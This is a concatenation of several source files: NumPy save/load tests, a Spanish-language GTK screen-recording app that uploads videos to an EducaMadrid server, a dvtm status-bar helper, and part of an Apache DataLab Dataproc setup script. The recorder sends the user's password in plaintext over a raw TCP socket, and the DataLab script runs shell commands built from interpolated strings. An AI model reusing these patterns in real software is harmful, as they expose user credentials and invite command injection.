            with path.open('w') as f:
                f.write(u'A,B\n0,1\n2,3')
            kwargs = dict(delimiter=",", missing_values="N/A", names=True)
            test = np.recfromtxt(path, **kwargs)
            control = np.array([(0, 1), (2, 3)],
                               dtype=[('A', int), ('B', int)])
            assert_(isinstance(test, np.recarray))
            assert_equal(test, control)
    def test_recfromcsv(self):
        # recfromcsv accepts a Path argument.
        with temppath(suffix='.txt') as path:
            path = Path(path)
            with path.open('w') as f:
                f.write(u'A,B\n0,1\n2,3')
            kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
            test = np.recfromcsv(path, dtype=None, **kwargs)
            control = np.array([(0, 1), (2, 3)],
                               dtype=[('A', int), ('B', int)])
            assert_(isinstance(test, np.recarray))
            assert_equal(test, control)
def test_gzip_load():
    """np.save/np.load round-trip through a GzipFile wrapper."""
    arr = np.random.random((5, 5))
    buf = BytesIO()
    writer = gzip.GzipFile(fileobj=buf, mode="w")
    np.save(writer, arr)
    writer.close()
    buf.seek(0)
    reader = gzip.GzipFile(fileobj=buf, mode="r")
    assert_array_equal(np.load(reader), arr)
# These next two classes encode the minimal API needed to save()/load() arrays.
# The `test_ducktyping` ensures they work correctly
class JustWriter(object):
    """Minimal write-only file duck type for np.save().

    Exposes only write() and flush(), both delegated to the wrapped
    stream, to prove save() needs nothing more.
    """

    def __init__(self, base):
        self.base = base

    def write(self, data):
        # Pass through and return whatever the wrapped stream returns.
        return self.base.write(data)

    def flush(self):
        return self.base.flush()
class JustReader(object):
    """Minimal read-only file duck type for np.load().

    Exposes only read() and seek(), both delegated to the wrapped
    stream, to prove load() needs nothing more.
    """

    def __init__(self, base):
        self.base = base

    def read(self, n):
        return self.base.read(n)

    def seek(self, off, whence=0):
        # Same default whence as io streams (absolute positioning).
        return self.base.seek(off, whence)
def test_ducktyping():
    """save()/load() only require write/flush and read/seek respectively."""
    arr = np.random.random((5, 5))
    stream = BytesIO()
    writer = JustWriter(stream)
    np.save(writer, arr)
    writer.flush()
    stream.seek(0)
    reader = JustReader(stream)
    assert_array_equal(np.load(reader), arr)
def test_gzip_loadtxt():
    # On Windows a NamedTemporaryFile cannot be reopened while still
    # open, so the gzipped payload is first assembled in memory and then
    # copied to a securely created temporary path for loadtxt to read.
    buf = BytesIO()
    gz = gzip.GzipFile(fileobj=buf, mode='w')
    gz.write(b'1 2 3\n')
    gz.close()
    buf.seek(0)
    with temppath(suffix='.gz') as name:
        with open(name, 'wb') as f:
            f.write(buf.read())
        res = np.loadtxt(name)
    buf.close()
    assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
    """loadtxt reads directly from an open GzipFile object."""
    buf = BytesIO()
    writer = gzip.GzipFile(fileobj=buf, mode="w")
    writer.write(b'1 2 3\n')
    writer.close()
    buf.seek(0)
    reader = gzip.GzipFile(fileobj=buf, mode="r")
    assert_array_equal(np.loadtxt(reader), [1, 2, 3])
def test_npzfile_dict():
    """NpzFile supports the mapping protocol: in, keys(), items(), iter."""
    stream = BytesIO()
    np.savez(stream, x=np.zeros((3, 3)), y=np.zeros((3, 3)))
    stream.seek(0)
    z = np.load(stream)
    assert_('x' in z)
    assert_('y' in z)
    assert_('x' in z.keys())
    assert_('y' in z.keys())
    for name, arr in z.items():
        assert_(name in ['x', 'y'])
        assert_equal(arr.shape, (3, 3))
    assert_(len(z.items()) == 2)
    for name in z:
        assert_(name in ['x', 'y'])
    # keys() stays valid after iteration.
    assert_('x' in z.keys())
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
    # Objects returned by np.load should be freed by reference counting
    # alone, without requiring the garbage collector to break cycles.
    buf = BytesIO()
    np.savez(buf, [1, 2, 3])
    buf.seek(0)
    with assert_no_gc_cycles():
        np.load(buf)
    buf.seek(0)
    dt = [("a", 'u1', 2), ("b", 'u1', 2)]
    with assert_no_gc_cycles():
        x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
        assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
|
webcam.py | #!/usr/bin/python3
#
# Copyright (C) 2020 P.L. Lucas
#
#
# LICENSE: BSD
# You may use this file under the terms of the BSD license as follows:
#
# "Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of developers or companies in the above copyright, Digia Plc and its
# Subsidiary(-ies) nor the names of its contributors may be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
# Requires the library:
# https://github.com/owncloud/pyocclient
#import shlex, subprocess
import socket
import os, sys
import datetime
import os.path
import threading
import time
import owncloud
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import GLib, Gtk, GObject
class Handler:
    """GTK signal handler for the screen/webcam recorder application.

    Persists UI settings in ~/.config/viticulosa.txt, drives a helper
    process over the UNIX socket './uds_socket' (ffmpeg screen-recording
    and camera-preview commands), and uploads finished recordings to a
    remote server (plus an ownCloud credential check) from background
    threads.
    """
    def __init__(self, builder):
        # builder: Gtk.Builder holding the widgets referenced by id below.
        self.builder = builder
        self.rotacion = "none"  # camera rotation setting
        self.espejo = "none"  # camera mirror setting
        self.camara = None  # truthy while the camera preview runs
        self.grabacion = None  # truthy while a recording is in progress
        self.alto_pantalla = '600'  # screen height (refreshed via xwininfo)
        self.ancho_pantalla = '800'  # screen width (refreshed via xwininfo)
        self.archivo_actual = None  # path of the recording being written
        self.load_settings()
        self.hilos = []  # background upload threads
        self.mostrar_mensaje_fin_subida = False
        self.credenciales_modificadas = True  # force a credential re-check
        self.sock = None  # lazily-connected UNIX socket to the helper
    def load_settings(self):
        """Read ~/.config/viticulosa.txt and restore the UI state."""
        config = os.path.expanduser('~/.config/viticulosa.txt')
        if os.path.exists(config):
            fin = open(config)
            for linea in fin:
                # Each line is a simple 'key=value' pair.
                campos = linea.split('=')
                if len(campos) > 1:
                    if campos[0] == 'rotacion':
                        self.rotacion = campos[1].strip()
                    elif campos[0] == 'espejo':
                        self.espejo = campos[1].strip()
                    elif campos[0] == 'servidor':
                        self.builder.get_object("servidor").set_text(campos[1].strip())
                    elif campos[0] == 'login':
                        self.builder.get_object("login").set_text(campos[1].strip())
                    elif campos[0] == 'curso':
                        self.builder.get_object("curso").set_text(campos[1].strip())
            fin.close()
        # Reflect the loaded values in the combo boxes.
        camara_rotacion = self.builder.get_object('camara_rotacion')
        if self.rotacion == 'none':
            camara_rotacion.set_active(0)
        elif self.rotacion == 'clockwise':
            camara_rotacion.set_active(1)
        elif self.rotacion == 'rotate-180':
            camara_rotacion.set_active(2)
        elif self.rotacion == 'counterclockwise':
            camara_rotacion.set_active(3)
        espejo = self.builder.get_object('espejo')
        if self.espejo == 'none':
            espejo.set_active(0)
        elif self.espejo == 'horizontal-flip':
            espejo.set_active(1)
        elif self.espejo == 'vertical-flip':
            espejo.set_active(2)
    def save_settings(self):
        """Write the current UI state to ~/.config/viticulosa.txt."""
        camara_rotacion = self.builder.get_object('camara_rotacion')
        valor = camara_rotacion.get_active()
        camara = 'none'
        if valor == 0:
            camara = "none"
        elif valor == 1:
            camara = "clockwise"
        elif valor == 2:
            camara = "rotate-180"
        elif valor == 3:
            camara = "counterclockwise"
        espejo_obj = self.builder.get_object('espejo')
        valor = espejo_obj.get_active()
        espejo = 'none'
        if valor == 0:
            espejo = "none"
        elif valor == 1:
            espejo = "horizontal-flip"
        elif valor == 2:
            espejo = "vertical-flip"
        servidor = self.builder.get_object("servidor").get_text()
        login = self.builder.get_object("login").get_text()
        curso = self.builder.get_object("curso").get_text()
        config = os.path.expanduser('~/.config/viticulosa.txt')
        if not os.path.exists(config):
            # Make sure ~/.config exists before the first save.
            path = os.path.expanduser('~/.config')
            if not os.path.exists(path):
                os.makedirs(path)
        fout = open(config, 'w')
        fout.write('rotacion={0}\n'.format(camara))
        fout.write('espejo={0}\n'.format(espejo))
        fout.write('servidor={0}\n'.format(servidor))
        fout.write('login={0}\n'.format(login))
        fout.write('curso={0}\n'.format(curso))
        fout.close()
    def onDestroy(self, *args):
        """Window-close handler: stop recording/preview, maybe upload."""
        if self.grabacion != None:
            #self.grabacion.terminate()
            #self.grabacion.wait()
            self.send_message(b'stop ffmpeg:')
            self.grabacion = None
            if self.builder.get_object("subir_videos").get_active():
                # Upload the file to the cloud in a background thread.
                print("Subiendo al servidor...")
                thread = threading.Thread(target=self.subir_al_servidor)
                thread.daemon = True
                thread.start()
                self.hilos.append(thread)
        if self.camara != None:
            #self.camara.terminate()
            self.send_message(b'stop camara:')
        self.save_settings()
        for thread in self.hilos:
            if thread.is_alive():
                # An upload is still running: warn the user and postpone
                # shutdown until onMensajeFinSubida() fires.
                self.mostrar_mensaje_fin_subida = True
                dialog = Gtk.MessageDialog(
                    transient_for=self.builder.get_object("window"),
                    flags=0,
                    message_type=Gtk.MessageType.ERROR,
                    buttons=Gtk.ButtonsType.CANCEL,
                    text="ERROR: Hay un proceso de carga al servidor en marcha",
                )
                dialog.format_secondary_text(
                    "Todavía hay un vídeo que se está transfiriendo al servidor de EducaMadrid. Si está guardando los vídeos en un dispositivo extraible, por favor, no lo desconecte todavía"
                )
                dialog.run()
                dialog.destroy()
                return
        Gtk.main_quit()
        self.send_message(b'quit:')
    def onMensajeFinSubida(self):
        """Idle callback fired when an upload thread finishes.

        Quits the main loop once no upload threads remain alive.
        """
        hilos_vivos = False
        for thread in self.hilos:
            if thread.is_alive():
                hilos_vivos = True
                break
        if not hilos_vivos:
            dialog = Gtk.MessageDialog(
                transient_for=self.builder.get_object("window"),
                flags=0,
                message_type=Gtk.MessageType.INFO,
                buttons=Gtk.ButtonsType.CANCEL,
                text="Han finalizado los procesos de subida",
            )
            dialog.format_secondary_text(
                "Los vídeos han sido trasferidos al servidor, puede desconectar los dispositivos extraibles en el caso de que esté guardando ahí sus vídeos"
            )
            dialog.run()
            dialog.destroy()
            Gtk.main_quit()
    def onRotacion(self, combo):
        """Rotation combo changed: update the setting and persist it."""
        valor = combo.get_active()
        if valor == 0:
            self.rotacion = "none"
        elif valor == 1:
            self.rotacion = "clockwise"
        elif valor == 2:
            self.rotacion = "rotate-180"
        elif valor == 3:
            self.rotacion = "counterclockwise"
        self.save_settings()
    def onEspejo(self, combo):
        """Mirror combo changed: update the setting and persist it."""
        valor = combo.get_active()
        if valor == 0:
            self.espejo = "none"
        elif valor == 1:
            self.espejo = "horizontal-flip"
        elif valor == 2:
            self.espejo = "vertical-flip"
        self.save_settings()
    def onSubirVideos(self, ok):
        """Toggle sensitivity of the upload fields with the checkbox."""
        ok = self.builder.get_object("subir_videos").get_active()
        self.builder.get_object("servidor").set_sensitive(ok)
        self.builder.get_object("login").set_sensitive(ok)
        self.builder.get_object("password").set_sensitive(ok)
        self.builder.get_object("curso").set_sensitive(ok)
    def onCredenciales(self, entry):
        """Any credential field was edited: require a fresh check."""
        self.credenciales_modificadas = True
    def onGrabarParar(self, button):
        """Record/stop button: stop (and maybe upload) or start anew."""
        if self.grabacion != None:
            # A recording is active: stop it.
            #self.grabacion.terminate()
            #self.grabacion.wait()
            self.send_message(b'stop ffmpeg:')
            #time.sleep(10)
            self.builder.get_object("grabar").set_label('Grabar')
            self.grabacion = None
            if self.builder.get_object("subir_videos").get_active():
                # Upload the file to the cloud in a background thread.
                print("Subiendo al servidor...")
                thread = threading.Thread(target=self.subir_al_servidor)
                thread.daemon = True
                thread.start()
                self.hilos.append(thread)
            return
        if self.credenciales_modificadas and self.builder.get_object("subir_videos").get_active():
            dialog = Gtk.MessageDialog(
                transient_for=self.builder.get_object("window"),
                flags=0,
                message_type=Gtk.MessageType.ERROR,
                buttons=Gtk.ButtonsType.CANCEL,
                text="ERROR: Debe comprobar las credenciales",
            )
            dialog.format_secondary_text(
                "Debe verificar que las credenciales son correctas. Pulse el boton de comprobar credenciales."
            )
            dialog.run()
            dialog.destroy()
            return
        # NOTE(review): uses the module-level 'builder', not self.builder —
        # works only because both refer to the same Gtk.Builder instance.
        fileselect = builder.get_object("directorio_salida")
        carpeta = fileselect.get_uri()
        if carpeta == None:
            dialog = Gtk.MessageDialog(
                transient_for=self.builder.get_object("window"),
                flags=0,
                message_type=Gtk.MessageType.ERROR,
                buttons=Gtk.ButtonsType.CANCEL,
                text="ERROR: Debe seleccionar una carpeta de grabación",
            )
            dialog.format_secondary_text(
                "Debe seleccionar una carpeta en la que guardar la grabación."
            )
            dialog.run()
            dialog.destroy()
            return
        # Convert the URI into a plain filesystem path.
        if carpeta.startswith('file://'):
            carpeta = carpeta[len('file://'):]
        fecha = datetime.datetime.now()
        # The timestamp is used as the file name; ':' is replaced because
        # it is awkward in file names on some filesystems.
        #archivo = '{0}/{1}'.format(carpeta, fecha.isoformat(sep=' ', timespec='seconds').replace(':', '·'))
        archivo = '{0}/{1}'.format(carpeta, fecha.isoformat(sep=' ').replace(':', '·').split('.')[0])
        self.archivo_actual = '{0}.mp4'.format(archivo)
        print(archivo)
        #return
        self.builder.get_object("grabar").set_label('Parar')
        self.reiniciar_grabacion(archivo)
    def onVerCamara(self, button):
        """Start, or stop and restart, the camera preview."""
        if self.camara == None:
            self.reiniciar_camara()
        else:
            #self.camara.terminate()
            self.send_message(b'stop camara:')
            self.reiniciar_camara()
    def reiniciar_camara(self):
        """Ask the helper to (re)start the ffmpeg camera preview.

        Maps the rotation/mirror settings onto ffmpeg -vf filters.
        """
        #command_line = 'camara: -v v4l2src device=/dev/video0 ! video/x-raw,framerate=10/1 ! videoflip method={0} ! videoflip method={1} ! videoconvert ! autovideosink\n'.format(self.rotacion, self.espejo).encode()
        rotacion = ""
        if self.rotacion == 'none':
            rotacion = ""
        elif self.rotacion == 'clockwise':
            rotacion = ",transpose=1"
        elif self.rotacion == 'rotate-180':
            rotacion = ",transpose=2,transpose=2"
        elif self.rotacion == 'counterclockwise':
            rotacion = ",transpose=3,hflip"
        espejo = ""
        if self.espejo == 'none':
            espejo = ""
        elif self.espejo == 'horizontal-flip':
            espejo = ",hflip"
        elif self.espejo == 'vertical-flip':
            espejo = ",vflip"
        command_line = 'camara: -f v4l2 -i /dev/video0 -vf "format=yuv420p{0}{1}"\n'.format(rotacion, espejo).encode()
        self.send_message(command_line)
        self.camara = True
        #command_line = 'gst-launch-1.0 -v v4l2src device=/dev/video0 ! video/x-raw,framerate=10/1 ! videoflip method={0} ! videoflip method={1} ! videoconvert ! autovideosink'.format(self.rotacion, self.espejo)
        #args = shlex.split(command_line)
        #self.camara = subprocess.Popen(args)
    def send_message(self, command_line):
        """Send a command (bytes) to the helper over './uds_socket'.

        Connects lazily on first use; for 'stop ffmpeg' it waits for a
        one-byte acknowledgement. Exits the program on socket errors.
        """
        try:
            if self.sock == None:
                server_address = './uds_socket'
                self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
                self.sock.connect(server_address)
            self.sock.sendall(command_line)
            self.sock.sendall(b'\n')
            if command_line.startswith(b'stop ffmpeg'):
                data = self.sock.recv(1)
        except socket.error as msg:
            print(msg)
            sys.exit(1)
        #finally:
        #    print('closing socket')
        #    self.sock.close()
    def onComprobarCredenciales(self, button):
        """Verify server reachability and ownCloud credentials."""
        if not self.builder.get_object("subir_videos").get_active():
            dialog = Gtk.MessageDialog(
                transient_for=self.builder.get_object("window"),
                flags=0,
                message_type=Gtk.MessageType.ERROR,
                buttons=Gtk.ButtonsType.CANCEL,
                text="ERROR: Debe activar la subida de vídeos",
            )
            dialog.format_secondary_text(
                "Para poder comprobar las credenciales, debe activar la subida de vídeos."
            )
            dialog.run()
            dialog.destroy()
            return
        # Check that the EducaMadrid connection credentials are correct
        # and that the server is up.
        self.credenciales_modificadas = False
        # Server reachability check.
        servidor = self.builder.get_object("servidor").get_text()
        r = None
        try:
            #r = requests.post(servidor.strip()+'/cgi-bin/upload.py', data={})
            r = self.check_server()
        except Exception as err:
            self.credenciales_modificadas = True
            dialog = Gtk.MessageDialog(
                transient_for=self.builder.get_object("window"),
                flags=0,
                message_type=Gtk.MessageType.ERROR,
                buttons=Gtk.ButtonsType.CANCEL,
                text="ERROR: No se puede conectar con el servidor",
            )
            dialog.format_secondary_text(
                "Verifique que la dirección del servidor es la correcta y que el servidor está activo. Verifique que el equipo puede navegar correctamente."
            )
            dialog.run()
            dialog.destroy()
        if r:
            # Server is up.
            # Now validate the ownCloud credentials.
            oc = None
            try:
                oc = owncloud.Client('http://cloud.educa.madrid.org', dav_endpoint_version = 10)
                usuario = self.builder.get_object("login").get_text().strip()
                password = self.builder.get_object("password").get_text()
                oc.login(usuario, password)
            except Exception as err:
                self.credenciales_modificadas = True
            # Files are shared in the cloud and links sent by e-mail only
            # when the "enviar" option is passed on the command line:
            if oc == None:
                self.credenciales_modificadas = True
            if self.credenciales_modificadas:
                dialog = Gtk.MessageDialog(
                    transient_for=self.builder.get_object("window"),
                    flags=0,
                    message_type=Gtk.MessageType.ERROR,
                    buttons=Gtk.ButtonsType.CANCEL,
                    text="ERROR: Las credenciales no son válidas",
                )
                dialog.format_secondary_text(
                    "Verifique el usuario o contraseña. Verifique que el equipo puede navegar correctamente."
                )
                dialog.run()
                dialog.destroy()
            else:
                dialog = Gtk.MessageDialog(
                    transient_for=self.builder.get_object("window"),
                    flags=0,
                    message_type=Gtk.MessageType.INFO,
                    buttons=Gtk.ButtonsType.CANCEL,
                    text="Las credenciales son válidas",
                )
                dialog.format_secondary_text(
                    "Las credenciales son válidas."
                )
                dialog.run()
                dialog.destroy()
        else:
            self.credenciales_modificadas = True
            dialog = Gtk.MessageDialog(
                transient_for=self.builder.get_object("window"),
                flags=0,
                message_type=Gtk.MessageType.ERROR,
                buttons=Gtk.ButtonsType.CANCEL,
                text="ERROR: No se puede conectar con el servidor",
            )
            dialog.format_secondary_text(
                "Verifique que la dirección del servidor es la correcta y que el servidor está activo. Verifique que el equipo puede navegar correctamente."
            )
            dialog.run()
            dialog.destroy()
    def reiniciar_grabacion(self, archivo):
        """Ask the helper to start an ffmpeg screen+audio recording."""
        self.pantalla_propiedades()
        # Recording at 25 frames per second:
        #command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 25 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 0 -threads 0 -acodec pcm_s16le -y "{2}.mkv"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
        # 5 frames per second are recorded to reduce the video size:
        #command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 0 -threads 0 -acodec pcm_s16le -y "{2}.mkv"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
        # High compression, for a powerful CPU:
        #command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx265 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
        # Moderate compression, for a less powerful CPU:
        #command_line = 'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo)
        #print(command_line)
        #args = shlex.split(command_line)
        #self.grabacion = subprocess.Popen(args)
        #command_line = 'ffmpeg: -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo).encode()
        command_line = 'ffmpeg: -f alsa -ac 2 -i pulse -f x11grab -r 5 -s {0}x{1} -i :0.0 -vcodec libx264 -strict -2 -pix_fmt yuv420p -preset ultrafast -crf 28 -threads 0 -y "{2}.mp4"'.format(self.ancho_pantalla, self.alto_pantalla, archivo).encode()
        print(command_line)
        self.send_message(command_line)
        self.grabacion = True
    def pantalla_propiedades(self):
        """Query the root window size with xwininfo into ancho/alto."""
        fin = os.popen('xwininfo -root')
        for linea in fin:
            l = linea.strip()
            if l.startswith('Height:'):
                self.alto_pantalla = l[len('Height:'):].strip()
            elif l.startswith('Width:'):
                self.ancho_pantalla = l[len('Width:'):].strip()
        fin.close()
    def check_server(self):
        """Return True if the upload server accepts a TCP connection."""
        ok = False
        # Create a TCP/IP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Connect the socket to the port where the server is listening
        servidor = self.builder.get_object("servidor").get_text()
        if ':' in servidor:
            try:
                server_address = (servidor.split(':')[0], int(servidor.split(':')[1]))
                print('connecting to {} port {}'.format(*server_address))
                sock.connect(server_address)
                # Send data
                message = b'\n'
                print('sending {!r}'.format(message))
                sock.sendall(message)
                ok = True
            except Exception as err:
                print('Error:', err)
            finally:
                print('closing socket')
                sock.close()
        return ok
    def subir_al_servidor(self):
        """Upload self.archivo_actual to the configured server.

        Runs in a background thread: streams the credentials, the
        destination path and file name, a '####' separator line, and
        finally the raw file bytes over a plain TCP socket.
        """
        print("Subiendo al servidor...")
        servidor = self.builder.get_object("servidor").get_text().strip()
        login = self.builder.get_object("login").get_text().strip()
        password = self.builder.get_object("password").get_text().strip()
        curso = self.builder.get_object("curso").get_text().strip().upper()
        #with open(self.archivo_actual, 'rb') as f:
        #    r = requests.post(servidor.strip()+'/cgi-bin/upload.py',
        #        data={'login': login, 'password': password, 'ruta': '/CLASES/{0}'.format(curso)},
        #        files={'file': f})
        #    print(r.text)
        #time.sleep(10)
        # Create a TCP/IP socket
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Connect the socket to the port where the server is listening
        servidor = self.builder.get_object("servidor").get_text()
        if ':' in servidor:
            try:
                server_address = (servidor.split(':')[0], int(servidor.split(':')[1]))
                print('connecting to {} port {}'.format(*server_address))
                sock.connect(server_address)
                # Header lines, then the separator, then the payload.
                message = 'login={0}\n'.format(login)
                sock.sendall(message.encode())
                message = 'password={0}\n'.format(password)
                sock.sendall(message.encode())
                message = 'ruta=/CLASES/{0}\n'.format(curso)
                sock.sendall(message.encode())
                message = 'filename={0}\n'.format(self.archivo_actual)
                sock.sendall(message.encode())
                sock.sendall(b'####\n')
                fin = open(self.archivo_actual, 'rb')
                while True:
                    data = fin.read(1024)
                    #print(data)
                    if data:
                        sock.sendall(data)
                    else:
                        break
                fin.close()
            except Exception as err:
                print('Error en cliente:', err)
            finally:
                print('closing socket')
                sock.close()
        print("Fin de la subida")
        if self.mostrar_mensaje_fin_subida:
            # Marshal the completion dialog back onto the GTK main loop.
            GLib.idle_add(self.onMensajeFinSubida)
#include main_glade main.glade
# Application entry point: build the UI from main.glade, wire the
# Handler callbacks, and run the GTK main loop.
builder = Gtk.Builder()
#builder.add_from_string(main_glade)
builder.add_from_file('main.glade')
builder.connect_signals(Handler(builder))
window = builder.get_object("window")
window.show_all()
Gtk.main()
|
dvtmstatus.py | from threading import Thread
import sys
class Writer:
    """Holds the most recent value for one status-bar slot.

    Each write() stores the new value and asks the owning bar to repaint
    the whole status line; str() renders the stored value.
    """

    def __init__(self, parent):
        self.value = ''
        self.parent = parent

    def write(self, value):
        # Remember the newest value, then trigger a full redraw.
        self.value = value
        self.parent.write()

    def __str__(self):
        return str(self.value)
class StatusBar:
    """Composes static strings and live callable-driven items into one
    status line printed to stdout."""

    def __init__(self, *values):
        # Each item is a (renderable, thread) pair; static values carry no thread.
        self.items = []
        for value in values:
            if not callable(value):
                self.items.append((value, None))
                continue
            writer = Writer(self)
            worker = Thread(target=value, args=(writer,), daemon=True)
            self.items.append((writer, worker))

    def write(self):
        """Render every item and flush the assembled line to stdout."""
        parts = [str(item) for item, _ in self.items]
        print(''.join(parts))
        sys.stdout.flush()

    def start(self):
        """Launch all worker threads, then block waiting on each of them."""
        workers = [thread for _, thread in self.items if thread is not None]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
|
dataengine-service_configure.py | #!/usr/bin/python3
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import datalab.actions_lib
import datalab.fab
import datalab.meta_lib
import datalab.notebook_lib
import json
import logging
import multiprocessing
import os
import sys
import traceback
import subprocess
from fabric import *
def configure_dataengine_service(instance, dataproc_conf):
    """Configure one Dataproc cluster node: HTTP proxy, livy/pip setup and
    the edge reverse-proxy template.

    Parameters:
        instance: cluster node name; its private IP is resolved via the
            module-level GCPMeta helper.
        dataproc_conf: dict of cluster-wide settings; mutated here
            ('instance_ip' is set for this node).

    Presumably runs as a multiprocessing worker (see __main__): on any
    failure it deletes the Dataproc cluster and exits with status 1 so the
    parent can detect a nonzero exitcode.
    """
    dataproc_conf['instance_ip'] = GCPMeta.get_private_ip_address(instance)
    # configuring proxy on Data Engine service
    try:
        logging.info('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
        print('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
        additional_config = {"proxy_host": dataproc_conf['edge_instance_name'], "proxy_port": "3128"}
        params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}" \
            .format(dataproc_conf['instance_ip'], dataproc_conf['cluster_name'], dataproc_conf['key_path'],
                    json.dumps(additional_config), dataproc_conf['datalab_ssh_user'])
        try:
            subprocess.run("~/scripts/{}.py {}".format('common_configure_proxy', params), shell=True, check=True)
        # NOTE(review): bare except converted to a generic Exception so the
        # outer handler reports it; the traceback is printed here first.
        except:
            traceback.print_exc()
            raise Exception
    except Exception as err:
        datalab.fab.append_result("Failed to configure proxy.", str(err))
        GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
    try:
        logging.info('[CONFIGURE DATAENGINE SERVICE]')
        print('[CONFIGURE DATAENGINE SERVICE]')
        try:
            # Several datalab helpers read this module-level connection.
            global conn
            conn = datalab.fab.init_datalab_connection(dataproc_conf['instance_ip'], dataproc_conf['datalab_ssh_user'], dataproc_conf['key_path'])
            datalab.fab.configure_data_engine_service_livy(dataproc_conf['instance_ip'],
                                                           dataproc_conf['datalab_ssh_user'],
                                                           dataproc_conf['key_path'])
            datalab.notebook_lib.install_os_pkg([['python3-pip', 'N/A']])
            datalab.fab.configure_data_engine_service_pip(dataproc_conf['instance_ip'],
                                                          dataproc_conf['datalab_ssh_user'],
                                                          dataproc_conf['key_path'])
        except:
            traceback.print_exc()
            raise Exception
    except Exception as err:
        datalab.fab.append_result("Failed to configure dataengine service.", str(err))
        GCPActions.delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
        sys.exit(1)
    try:
        print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
        logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
        # Describe every worker ("core") node so the proxy template can route
        # to each datanode by name, IP and internal DNS.
        slaves = []
        for idx, instance in enumerate(dataproc_conf['cluster_core_instances']):
            slave_ip = GCPMeta.get_private_ip_address(instance)
            slave = {
                'name': 'datanode{}'.format(idx + 1),
                'ip': slave_ip,
                'dns': "{0}.c.{1}.internal".format(instance, os.environ['gcp_project_id'])
            }
            slaves.append(slave)
        additional_info = {
            "computational_name": dataproc_conf['computational_name'],
            "master_ip": dataproc_conf['master_ip'],
            "master_dns": "{0}.c.{1}.internal".format(dataproc_conf['master_name'], os.environ['gcp_project_id']),
            "slaves": slaves,
            "tensor": False
        }
        params = "--edge_hostname {} " \
                 "--keyfile {} " \
                 "--os_user {} " \
                 "--type {} " \
                 "--exploratory_name {} " \
                 "--additional_info '{}'"\
            .format(dataproc_conf['edge_instance_hostname'],
                    dataproc_conf['key_path'],
                    dataproc_conf['datalab_ssh_user'],
                    'dataengine-service',
                    dataproc_conf['exploratory_name'],
                    json.dumps(additional_info))
        try:
            subprocess.run("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params), shell=True, check=True)
        except:
            datalab.fab.append_result("Failed edge reverse proxy template")
            raise Exception
    except Exception as err:
